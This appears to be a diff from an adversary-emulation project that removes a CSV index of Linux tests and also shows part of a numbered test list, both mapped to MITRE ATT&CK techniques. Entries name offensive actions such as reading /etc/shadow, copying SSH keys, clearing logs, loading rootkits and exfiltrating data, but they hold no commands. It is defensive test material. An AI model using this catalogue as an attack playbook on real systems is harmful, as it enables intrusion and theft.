845 command-and-control T1071.004 DNS 2 DNS Regular Beaconing 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 powershell
846 command-and-control T1071.004 DNS 3 DNS Long Domain Query fef31710-223a-40ee-8462-a396d6b66978 powershell
847 command-and-control T1071.004 DNS 4 DNS C2 e7bf9802-2e78-4db9-93b5-181b7bcd37d7 powershell
848 command-and-control T1573 Encrypted Channel 1 OpenSSL C2 21caf58e-87ad-440c-a6b8-3ac259964003 powershell
849 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 bash
850 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f bash
851 command-and-control T1105 Ingress Tool Transfer 3 scp remote file copy (push) 83a49600-222b-4866-80a0-37736ad29344 bash
852 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 bash
853 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
854 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef bash
855 command-and-control T1105 Ingress Tool Transfer 7 certutil download (urlcache) dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 command_prompt
856 command-and-control T1105 Ingress Tool Transfer 8 certutil download (verifyctl) ffd492e3-0455-4518-9fb1-46527c9f241b powershell
857 command-and-control T1105 Ingress Tool Transfer 9 Windows - BITSAdmin BITS Download a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b command_prompt
858 command-and-control T1105 Ingress Tool Transfer 10 Windows - PowerShell Download 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 powershell
859 command-and-control T1105 Ingress Tool Transfer 11 OSTAP Worming Activity 2ca61766-b456-4fcf-a35a-1233685e1cad command_prompt
860 command-and-control T1105 Ingress Tool Transfer 12 svchost writing a file to a UNC path fa5a2759-41d7-4e13-a19c-e8f28a53566f command_prompt
861 command-and-control T1105 Ingress Tool Transfer 13 Download a File with Windows Defender MpCmdRun.exe 815bef8b-bf91-4b67-be4c-abe4c2a94ccc command_prompt
862 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
863 command-and-control T1090.001 Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
864 command-and-control T1090.001 Internal Proxy 2 Connection Proxy for macOS UI 648d68c1-8bcd-4486-9abe-71c6655b6a2c sh
865 command-and-control T1090.001 Internal Proxy 3 portproxy reg key b8223ea9-4be2-44a6-b50a-9657a3d4e72a powershell
866 command-and-control T1095 Non-Application Layer Protocol 1 ICMP C2 0268e63c-e244-42db-bef7-72a9e59fc1fc powershell
867 command-and-control T1095 Non-Application Layer Protocol 2 Netcat C2 bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 powershell
868 command-and-control T1095 Non-Application Layer Protocol 3 Powercat C2 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e powershell
869 command-and-control T1571 Non-Standard Port 1 Testing usage of uncommonly used port with PowerShell 21fe622f-8e53-4b31-ba83-6d333c2583f4 powershell
870 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
871 command-and-control T1219 Remote Access Software 1 TeamViewer Files Detected Test on Windows 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 powershell
872 command-and-control T1219 Remote Access Software 2 AnyDesk Files Detected Test on Windows 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 powershell
873 command-and-control T1219 Remote Access Software 3 LogMeIn Files Detected Test on Windows d03683ec-aae0-42f9-9b4c-534780e0f8e1 powershell
874 command-and-control T1132.001 Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
875 command-and-control T1132.001 Standard Encoding 2 XOR Encoded data. c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 powershell
876 command-and-control T1071.001 Web Protocols 1 Malicious User Agents - Powershell 81c13829-f6c9-45b8-85a6-053366d55297 powershell
877 command-and-control T1071.001 Web Protocols 2 Malicious User Agents - CMD dc3488b0-08c7-4fea-b585-905c83b48180 command_prompt
878 command-and-control T1071.001 Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
879 exfiltration T1020 Automated Exfiltration 1 IcedID Botnet HTTP PUT 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 powershell
880 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
881 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
882 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
883 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
884 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 2 Exfiltration Over Alternative Protocol - ICMP dd4b4421-2e25-4593-90ae-7021947ad12e powershell
885 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 3 Exfiltration Over Alternative Protocol - DNS c403b5a4-b5fc-49f2-b181-d1c80d27db45 manual
886 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 4 Exfiltration Over Alternative Protocol - HTTP 6aa58451-1121-4490-a8e9-1dada3f1c68c powershell
887 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 5 Exfiltration Over Alternative Protocol - SMTP ec3a835e-adca-4c7c-88d2-853b69c11bb9 powershell
888 initial-access T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
889 initial-access T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
890 initial-access T1078.003 Local Accounts 1 Create local account with admin priviliges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
891 initial-access T1566.001 Spearphishing Attachment 1 Download Phishing Attachment - VBScript 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
892 initial-access T1566.001 Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
atomics/Indexes/Indexes-CSV/linux-index.csv
-213
View File
@@ -1,213 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
collection,T1560.002,Archive via Library,4,Compressing data using tarfile in Python (Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,bash
collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
privilege-escalation,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
defense-evasion,T1070.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.003,Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
defense-evasion,T1070.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
defense-evasion,T1070.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1610,Deploy Container,1,Deploy container using nsenter container escape,58004e22-022c-4c51-b4a8-2b85ac5c596b,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh
defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1070.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce084-3922-4618-8d22-95f996173765,bash
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,bash
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,bash
impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - Linux,918f70ab-e1ef-49ff-bc57-b27021df84dd,bash
impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
impact,T1529,System Shutdown/Reboot,8,Shutdown System via `poweroff` - Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,bash
impact,T1529,System Shutdown/Reboot,9,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1083,File and Directory Discovery,3,Nix File and Diectory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1087.001,Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
discovery,T1087.001,Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
discovery,T1087.001,Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1069.001,Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
discovery,T1201,Password Policy Discovery,4,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1518.001,Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
